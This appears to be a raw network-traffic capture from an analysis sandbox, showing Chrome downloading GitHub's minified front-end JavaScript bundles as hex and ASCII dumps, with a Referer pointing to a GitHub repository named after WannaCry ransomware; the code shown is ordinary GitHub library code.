                                                                                      ETag: 0x8DC3EF8B979DFB4
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:28 GMT
                                                                                      Age: 1285253
                                                                                      X-Served-By: cache-iad-kcgs7200086-IAD, cache-lga21955-LGA
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 113, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 340edb38053fc9e4371965d207635af28b65d0f1
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6d 69 6e 69 2d 74 68 72 6f 74 74 6c 65 5f 64 69 73 74 5f 64 65 63 6f 72 61 74 6f 72 73 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 72 65 6d 6f 74 65 2d 66 6f 72 6d 5f 2d 30 31 66 39 66 61 22 2c 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 63 61 74 61 6c 79 73 74 5f 6c 69 62 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 68 79 64 72 6f 2d 61
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_github_mini-throttle_dist_decorators_js-node_modules_github_remote-form_-01f9fa","vendors-node_modules_github_catalyst_lib_index_js-node_modules_github_hydro-a
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 74 61 72 74 3a 6e 3d 21 30 2c 6d 69 64 64 6c 65 3a 72 3d 21 30 2c 6f 6e 63 65 3a 6f 3d 21 31 7d 3d 7b 7d 29 7b 6c 65 74 20 69 2c 73 3d 30 2c 61 3d 21 31 3b 66 75 6e 63 74 69 6f 6e 20 6c 28 2e 2e 2e 63 29 7b 69 66 28 61 29 72 65 74 75 72 6e 3b 6c 65 74 20 64 3d 44 61 74 65 2e 6e 6f 77 28 29 2d 73 3b 73 3d 44 61 74 65 2e 6e 6f 77 28 29 2c 6e 3f 28 6e 3d 21 31 2c 65 2e 61 70 70 6c 79 28 74 68 69 73 2c 63 29 2c 6f 26 26 6c 2e 63 61 6e 63 65 6c 28 29 29 3a 28 72 26 26 64 3c 74 7c 7c 21 72 29 26 26 28 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 69 29 2c 69 3d 73 65 74 54 69 6d 65 6f 75 74 28 28 29 3d 3e 7b 73 3d 44 61 74 65 2e 6e 6f 77 28 29 2c 65 2e 61 70 70 6c 79 28 74 68 69 73 2c 63 29 2c 6f 26 26 6c 2e 63 61 6e 63 65 6c 28 29 7d 2c 72 3f 74 2d 64 3a 74 29 29 7d
                                                                                      Data Ascii: tart:n=!0,middle:r=!0,once:o=!1}={}){let i,s=0,a=!1;function l(...c){if(a)return;let d=Date.now()-s;s=Date.now(),n?(n=!1,e.apply(this,c),o&&l.cancel()):(r&&d<t||!r)&&(clearTimeout(i),i=setTimeout(()=>{s=Date.now(),e.apply(this,c),o&&l.cancel()},r?t-d:t))}
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 74 2e 74 6f 53 74 72 69 6e 67 28 29 7d 28 65 29 3b 6e 26 26 28 74 2e 75 72 6c 2b 3d 28 7e 74 2e 75 72 6c 2e 69 6e 64 65 78 4f 66 28 22 3f 22 29 3f 22 26 22 3a 22 3f 22 29 2b 6e 29 7d 65 6c 73 65 20 74 2e 62 6f 64 79 3d 6e 65 77 20 46 6f 72 6d 44 61 74 61 28 65 29 3b 72 65 74 75 72 6e 20 74 7d 28 74 29 2c 5b 6c 2c 63 2c 64 5d 3d 6f 28 29 3b 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 75 28 6e 2c 74 2c 61 2c 6c 29 2e 74 68 65 6e 28 61 73 79 6e 63 20 65 3d 3e 7b 69 66 28 65 29 7b 66 6f 72 28 6c 65 74 20 65 20 6f 66 20 73 29 61 77 61 69 74 20 65 28 74 29 3b 68 28 61 29 2e 74 68 65 6e 28 63 2c 64 29 2e 63 61 74 63 68 28 28 29 3d 3e 7b 7d 29 2e 74 68 65 6e 28 28 29 3d 3e 7b 66 6f 72 28 6c 65 74 20 65 20 6f 66 20 69 29 65 28 74 29 7d 29 7d 65 6c 73
                                                                                      Data Ascii: t.toString()}(e);n&&(t.url+=(~t.url.indexOf("?")?"&":"?")+n)}else t.body=new FormData(e);return t}(t),[l,c,d]=o();e.preventDefault(),u(n,t,a,l).then(async e=>{if(e){for(let e of s)await e(t);h(a).then(c,d).catch(()=>{}).then(()=>{for(let e of i)e(t)})}els
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 2e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 73 3d 69 2e 6d 61 74 63 68 65 73 7c 7c 69 2e 77 65 62 6b 69 74 4d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 7c 7c 69 2e 6d 6f 7a 4d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 7c 7c 69 2e 6f 4d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 7c 7c 69 2e 6d 73 4d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 3b 72 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 73 2e 63 61 6c 6c 28 65 2c 74 29 7d 2c 72 2e 70 72 6f 74 6f 74 79 70 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c
                                                                                      Data Ascii: .document.documentElement,s=i.matches||i.webkitMatchesSelector||i.mozMatchesSelector||i.oMatchesSelector||i.msMatchesSelector;r.prototype.matchesSelector=function(e,t){return s.call(e,t)},r.prototype.querySelectorAll=function(e,t){return t.querySelectorAl
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 5b 5c 5c 5d 2b 29 2b 7c 5b 3e 2b 7e 5d 29 28 5c 73 2a 2c 5c 73 2a 29 3f 28 28 3f 3a 2e 7c 5c 72 7c 5c 6e 29 2a 29 2f 67 3b 66 75 6e 63 74 69 6f 6e 20 75 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 2c 6f 2c 69 2c 73 2c 61 2c 6c 3d 28 65 3d 65 2e 73 6c 69 63 65 28 30 29 2e 63 6f 6e 63 61 74 28 65 2e 64 65 66 61 75 6c 74 29 29 2e 6c 65 6e 67 74 68 2c 63 3d 74 2c 75 3d 5b 5d 3b 64 6f 20 69 66 28 64 2e 65 78 65 63 28 22 22 29 2c 28 6f 3d 64 2e 65 78 65 63 28 63 29 29 26 26 28 63 3d 6f 5b 33 5d 2c 6f 5b 32 5d 7c 7c 21 63 29 29 7b 66 6f 72 28 6e 3d 30 3b 6e 3c 6c 3b 6e 2b 2b 29 69 66 28 73 3d 28 61 3d 65 5b 6e 5d 29 2e 73 65 6c 65 63 74 6f 72 28 6f 5b 31 5d 29 29 7b 66 6f 72 28 72 3d 75 2e 6c 65 6e 67 74 68 2c 69 3d 21 31 3b 72 2d 2d 3b 29 69 66 28 75 5b 72 5d 2e 69
                                                                                      Data Ascii: [\\]+)+|[>+~])(\s*,\s*)?((?:.|\r|\n)*)/g;function u(e,t){var n,r,o,i,s,a,l=(e=e.slice(0).concat(e.default)).length,c=t,u=[];do if(d.exec(""),(o=d.exec(c))&&(c=o[3],o[2]||!c)){for(n=0;n<l;n++)if(s=(a=e[n]).selector(o[1])){for(r=u.length,i=!1;r--;)if(u[r].i
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 5b 6f 5d 2e 73 65 6c 65 63 74 6f 72 29 7d 7d 2c 72 2e 70 72 6f 74 6f 74 79 70 65 2e 71 75 65 72 79 41 6c 6c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 74 68 69 73 2e 73 65 6c 65 63 74 6f 72 73 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 5b 5d 3b 76 61 72 20 74 2c 6e 2c 72 2c 6f 2c 69 2c 73 2c 61 2c 6c 2c 63 3d 7b 7d 2c 64 3d 5b 5d 2c 75 3d 74 68 69 73 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 74 68 69 73 2e 73 65 6c 65 63 74 6f 72 73 2e 6a 6f 69 6e 28 22 2c 20 22 29 2c 65 29 3b 66 6f 72 28 74 3d 30 2c 72 3d 75 2e 6c 65 6e 67 74 68 3b 74 3c 72 3b 74 2b 2b 29 66 6f 72 28 6e 3d 30 2c 69 3d 75 5b 74 5d 2c 6f 3d 28 73 3d 74 68 69 73 2e 6d 61 74 63 68 65 73 28 69 29 29 2e 6c 65 6e 67 74 68 3b 6e 3c 6f 3b 6e 2b 2b 29 63 5b 28 6c 3d 73 5b 6e 5d
                                                                                      Data Ascii: [o].selector)}},r.prototype.queryAll=function(e){if(!this.selectors.length)return[];var t,n,r,o,i,s,a,l,c={},d=[],u=this.querySelectorAll(this.selectors.join(", "),e);for(t=0,r=u.length;t<r;t++)for(n=0,i=u[t],o=(s=this.matches(i)).length;n<o;n++)c[(l=s[n]
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 64 65 3a 6f 2c 6f 62 73 65 72 76 65 72 73 3a 69 7d 3b 6e 3f 72 2e 75 6e 73 68 69 66 74 28 73 29 3a 72 2e 70 75 73 68 28 73 29 7d 7d 77 68 69 6c 65 28 6f 3d 6f 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 29 72 65 74 75 72 6e 20 72 7d 28 74 2c 65 2e 74 61 72 67 65 74 2c 31 3d 3d 3d 65 2e 65 76 65 6e 74 50 68 61 73 65 29 3b 69 66 28 6e 2e 6c 65 6e 67 74 68 29 7b 76 28 65 2c 22 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 22 2c 77 29 2c 76 28 65 2c 22 73 74 6f 70 49 6d 6d 65 64 69 61 74 65 50 72 6f 70 61 67 61 74 69 6f 6e 22 2c 5f 29 2c 6b 28 65 2c 78 29 3b 66 6f 72 28 76 61 72 20 72 3d 30 2c 6f 3d 6e 2e 6c 65 6e 67 74 68 3b 72 3c 6f 26 26 21 6d 2e 67 65 74 28 65 29 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 6e 5b 72 5d 3b 62 2e 73 65 74 28 65 2c 69 2e 6e 6f 64 65 29
                                                                                      Data Ascii: de:o,observers:i};n?r.unshift(s):r.push(s)}}while(o=o.parentElement)return r}(t,e.target,1===e.eventPhase);if(n.length){v(e,"stopPropagation",w),v(e,"stopImmediatePropagation",_),k(e,x);for(var r=0,o=n.length;r<o&&!m.get(e);r++){var i=n[r];b.set(e,i.node)
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 2c 72 29 2c 72 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 66 6f 72 28 6c 65 74 20 74 20 6f 66 20 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 64 61 74 61 2d 61 63 74 69 6f 6e 5d 22 29 29 64 28 74 29 3b 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 6c 65 6d 65 6e 74 26 26 65 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 61 63 74 69 6f 6e 22 29 26 26 64 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 65 29 7b 6c 65 74 20 74 3d 65 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 3b 66 6f 72 28 6c 65 74 20 6e 20 6f 66 20 63 28 74 29 29 69 66 28 65 2e 74 79 70 65 3d 3d 3d 6e 2e 74 79 70 65 29 7b 6c 65 74 20 72 3d 74 2e 63 6c 6f 73 65 73 74 28 6e 2e 74 61 67 29 3b 6f 2e 68 61 73 28 72 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65
                                                                                      Data Ascii: ,r),r}function a(e){for(let t of e.querySelectorAll("[data-action]"))d(t);e instanceof Element&&e.hasAttribute("data-action")&&d(e)}function l(e){let t=e.currentTarget;for(let n of c(t))if(e.type===n.type){let r=t.closest(n.tag);o.has(r)&&"function"==type
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 29 2c 72 3d 6e 3f 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3f 2e 61 74 74 72 50 72 65 66 69 78 3f 3f 22 64 61 74 61 2d 22 3b 66 6f 72 28 6c 65 74 20 6f 20 6f 66 28 74 7c 7c 28 74 3d 76 28 6e 2c 70 29 29 2c 74 29 29 7b 6c 65 74 20 74 3d 65 5b 6f 5d 2c 6e 3d 66 28 60 24 7b 72 7d 24 7b 6f 7d 60 29 2c 69 3d 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 67 65 74 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 6e 29 7c 7c 22 22 7d 2c 73 65 74 28 65 29 7b 74 68 69 73 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 6e 2c 65 7c 7c 22 22 29 7d 7d 3b 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 74 3f 69 3d 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 67 65 74 28 29 7b
                                                                                      Data Ascii: ct.getPrototypeOf(e),r=n?.constructor?.attrPrefix??"data-";for(let o of(t||(t=v(n,p)),t)){let t=e[o],n=f(`${r}${o}`),i={configurable:!0,get(){return this.getAttribute(n)||""},set(e){this.setAttribute(n,e||"")}};"number"==typeof t?i={configurable:!0,get(){
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 22 22 29 3b 74 72 79 7b 77 69 6e 64 6f 77 2e 63 75 73 74 6f 6d 45 6c 65 6d 65 6e 74 73 2e 64 65 66 69 6e 65 28 74 2c 65 29 2c 77 69 6e 64 6f 77 5b 65 2e 6e 61 6d 65 5d 3d 63 75 73 74 6f 6d 45 6c 65 6d 65 6e 74 73 2e 67 65 74 28 74 29 7d 63 61 74 63 68 28 65 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 44 4f 4d 45 78 63 65 70 74 69 6f 6e 26 26 22 4e 6f 74 53 75 70 70 6f 72 74 65 64 45 72 72 6f 72 22 3d 3d 3d 65 2e 6e 61 6d 65 29 29 74 68 72 6f 77 20 65 7d 7d 28 65 29 7d 6f 62 73 65 72 76 65 64 41 74 74 72 69 62 75 74 65 73 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 7d 63 6f 6e 6e 65 63 74 65 64 43 61 6c 6c 62 61 63 6b 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3b 65 2e 74 6f 67 67 6c 65 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 63 61 74 61
                                                                                      Data Ascii: "");try{window.customElements.define(t,e),window[e.name]=customElements.get(t)}catch(e){if(!(e instanceof DOMException&&"NotSupportedError"===e.name))throw e}}(e)}observedAttributes(e,t){return t}connectedCallback(e,t){var n,r;e.toggleAttribute("data-cata


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      127192.168.2.1649837185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:28 UTC675OUTGET /assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_filter--b2311f-4c891ec4eeb9.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:28 UTC688INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 20877
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Thu, 07 Mar 2024 20:21:24 GMT
                                                                                      ETag: 0x8DC3EE42967F17E
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:28 GMT
                                                                                      Age: 1353043
                                                                                      X-Served-By: cache-iad-kiad7000129-IAD, cache-lga21957-LGA
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 294, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: bcbee0c364a3f6ee71a55779e1b3b7d6b06ecebe
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 66 69 6c 65 2d 61 74 74 61 63 68 6d 65 6e 74 2d 65 6c 65 6d 65 6e 74 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 66 69 6c 74 65 72 2d 2d 62 32 33 31 31 66 22 5d 2c 7b 35 37 32 36 30 3a 28 74 2c 65 2c 6e 29 3d 3e 7b 6e 2e 64 28 65 2c 7b 50 3a 28 29 3d 3e 41 74 74 61 63 68 6d 65 6e 74 7d 29 3b 6c 65 74 20 41 74 74 61 63 68 6d 65 6e 74 3d 63 6c 61 73 73 20 41 74 74 61 63 68 6d 65 6e 74 7b 63 6f
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_filter--b2311f"],{57260:(t,e,n)=>{n.d(e,{P:()=>Attachment});let Attachment=class Attachment{co
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 73 69 74 69 6f 6e 20 66 72 6f 6d 20 24 7b 74 68 69 73 2e 73 74 61 74 65 7d 20 74 6f 20 73 61 76 65 64 60 29 3b 74 68 69 73 2e 73 74 61 74 65 3d 22 73 61 76 65 64 22 2c 74 68 69 73 2e 69 64 3d 6e 75 6c 6c 21 3d 3d 28 65 3d 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 69 64 29 26 26 76 6f 69 64 20 30 21 3d 3d 65 3f 65 3a 6e 75 6c 6c 2c 74 68 69 73 2e 68 72 65 66 3d 6e 75 6c 6c 21 3d 3d 28 6e 3d 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 68 72 65 66 29 26 26 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 3a 6e 75 6c 6c 2c 74 68 69 73 2e 6e 61 6d 65 3d 6e 75 6c 6c 21 3d 3d 28 69 3d 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 6e 61 6d 65 29 26 26 76 6f 69 64 20 30 21 3d 3d 69 3f 69 3a 6e 75 6c 6c 7d 69 73 50 65 6e 64 69 6e 67 28 29 7b 72 65 74 75 72
                                                                                      Data Ascii: sition from ${this.state} to saved`);this.state="saved",this.id=null!==(e=null==t?void 0:t.id)&&void 0!==e?e:null,this.href=null!==(n=null==t?void 0:t.href)&&void 0!==n?n:null,this.name=null!==(i=null==t?void 0:t.name)&&void 0!==i?i:null}isPending(){retur
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 73 41 74 74 72 69 62 75 74 65 28 22 64 69 72 65 63 74 6f 72 79 22 29 7d 73 65 74 20 64 69 72 65 63 74 6f 72 79 28 74 29 7b 74 3f 74 68 69 73 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 64 69 72 65 63 74 6f 72 79 22 2c 22 22 29 3a 74 68 69 73 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 22 64 69 72 65 63 74 6f 72 79 22 29 7d 61 73 79 6e 63 20 61 74 74 61 63 68 28 74 29 7b 6c 65 74 20 65 3d 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 44 61 74 61 54 72 61 6e 73 66 65 72 3f 61 77 61 69 74 20 41 74 74 61 63 68 6d 65 6e 74 2e 74 72 61 76 65 72 73 65 28 74 2c 74 68 69 73 2e 64 69 72 65 63 74 6f 72 79 29 3a 41 74 74 61 63 68 6d 65 6e 74 2e 66 72 6f 6d 28 74 29 2c 6e 3d 74 68 69 73 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 6e 65 77 20 43 75 73 74 6f 6d 45 76
                                                                                      Data Ascii: sAttribute("directory")}set directory(t){t?this.setAttribute("directory",""):this.removeAttribute("directory")}async attach(t){let e=t instanceof DataTransfer?await Attachment.traverse(t,this.directory):Attachment.from(t),n=this.dispatchEvent(new CustomEv
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 65 74 75 72 6e 3b 6c 65 74 20 69 3d 5b 6e 5d 3b 65 2e 61 74 74 61 63 68 28 69 29 2c 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 66 28 74 29 7b 6c 65 74 20 65 3d 74 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 3b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 46 69 6c 65 41 74 74 61 63 68 6d 65 6e 74 45 6c 65 6d 65 6e 74 29 29 72 65 74 75 72 6e 3b 6c 65 74 20 6e 3d 74 2e 74 61 72 67 65 74 3b 69 66 28 21 28 6e 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 49 6e 70 75 74 45 6c 65 6d 65 6e 74 29 29 72 65 74 75 72 6e 3b 6c 65 74 20 69 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 6e 70 75 74 22 29 3b 69 66 28 69 26 26 6e 2e 69 64 21 3d 3d 69 29 72 65 74 75 72 6e 3b 6c 65 74 20 72 3d 6e 2e 66 69 6c 65 73 3b
                                                                                      Data Ascii: eturn;let i=[n];e.attach(i),t.preventDefault()}function f(t){let e=t.currentTarget;if(!(e instanceof FileAttachmentElement))return;let n=t.target;if(!(n instanceof HTMLInputElement))return;let i=e.getAttribute("input");if(i&&n.id!==i)return;let r=n.files;
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 75 74 22 2c 74 68 69 73 2e 64 65 62 6f 75 6e 63 65 49 6e 70 75 74 43 68 61 6e 67 65 29 29 7d 67 65 74 20 69 6e 70 75 74 28 29 7b 6c 65 74 20 74 3d 74 68 69 73 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 69 6e 70 75 74 22 29 3b 72 65 74 75 72 6e 20 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 49 6e 70 75 74 45 6c 65 6d 65 6e 74 3f 74 3a 6e 75 6c 6c 7d 72 65 73 65 74 28 29 7b 6c 65 74 20 74 3d 74 68 69 73 2e 69 6e 70 75 74 3b 74 26 26 28 74 2e 76 61 6c 75 65 3d 22 22 2c 74 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 6e 65 77 20 45 76 65 6e 74 28 22 63 68 61 6e 67 65 22 2c 7b 62 75 62 62 6c 65 73 3a 21 30 7d 29 29 29 7d 7d 3b 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 65 3d 21 31 29 7b 6c 65 74 20 6e 3d 74 2e 69 6e 70 75 74 3b 69 66
                                                                                      Data Ascii: ut",this.debounceInputChange))}get input(){let t=this.querySelector("input");return t instanceof HTMLInputElement?t:null}reset(){let t=this.input;t&&(t.value="",t.dispatchEvent(new Event("change",{bubbles:!0})))}};async function i(t,e=!1){let n=t.input;if
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 69 6e 70 75 74 2d 75 70 64 61 74 65 64 22 2c 7b 62 75 62 62 6c 65 73 3a 21 30 2c 64 65 74 61 69 6c 3a 7b 63 6f 75 6e 74 3a 63 2c 74 6f 74 61 6c 3a 75 7d 7d 29 29 7d 66 75 6e 63 74 69 6f 6e 20 72 28 74 2c 65 2c 6e 29 7b 6c 65 74 20 69 3d 2d 31 21 3d 3d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2e 69 6e 64 65 78 4f 66 28 6e 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 3b 72 65 74 75 72 6e 7b 6d 61 74 63 68 3a 69 2c 68 69 64 65 4e 65 77 3a 65 3d 3d 3d 6e 7d 7d 6c 65 74 20 6f 3d 46 69 6c 74 65 72 49 6e 70 75 74 45 6c 65 6d 65 6e 74 3b 77 69 6e 64 6f 77 2e 63 75 73 74 6f 6d 45 6c 65 6d 65 6e 74 73 2e 67 65 74 28 22 66 69 6c 74 65 72 2d 69 6e 70 75 74 22 29 7c 7c 28 77 69 6e 64 6f 77 2e 46 69 6c 74 65 72 49 6e 70 75 74 45 6c 65 6d 65 6e 74 3d 46 69 6c 74 65
                                                                                      Data Ascii: input-updated",{bubbles:!0,detail:{count:c,total:u}}))}function r(t,e,n){let i=-1!==e.toLowerCase().indexOf(n.toLowerCase());return{match:i,hideNew:e===n}}let o=FilterInputElement;window.customElements.get("filter-input")||(window.FilterInputElement=Filte
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 74 68 69 73 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 29 7c 7c 22 22 7d 73 65 74 20 73 72 63 28 74 29 7b 74 68 69 73 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 74 29 7d 7d 3b 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 72 28 74 2c 65 29 7b 6c 65 74 20 6e 3b 6c 65 74 20 72 3d 74 2e 69 6e 70 75 74 3b 69 66 28 21 72 29 72 65 74 75 72 6e 3b 6c 65 74 20 61 3d 69 2e 67 65 74 28 74 29 3b 69 66 28 21 61 29 72 65 74 75 72 6e 3b 6c 65 74 20 6c 3d 72 2e 76 61 6c 75 65 3b 69 66 28 65 26 26 61 2e 63 75 72 72 65 6e 74 51 75 65 72 79 3d 3d 3d 6c 29 72 65 74 75 72 6e 3b 61 2e 63 75 72 72 65 6e 74 51 75 65 72 79 3d 6c 3b 6c 65 74 20 73 3d 74 2e 73 72 63 3b 69 66 28 21 73 29 72 65 74 75 72 6e 3b 6c 65 74 20 75 3d 64 6f 63 75 6d 65 6e 74 2e
                                                                                      Data Ascii: this.getAttribute("src")||""}set src(t){this.setAttribute("src",t)}};async function r(t,e){let n;let r=t.input;if(!r)return;let a=i.get(t);if(!a)return;let l=r.value;if(e&&a.currentQuery===l)return;a.currentQuery=l;let s=t.src;if(!s)return;let u=document.
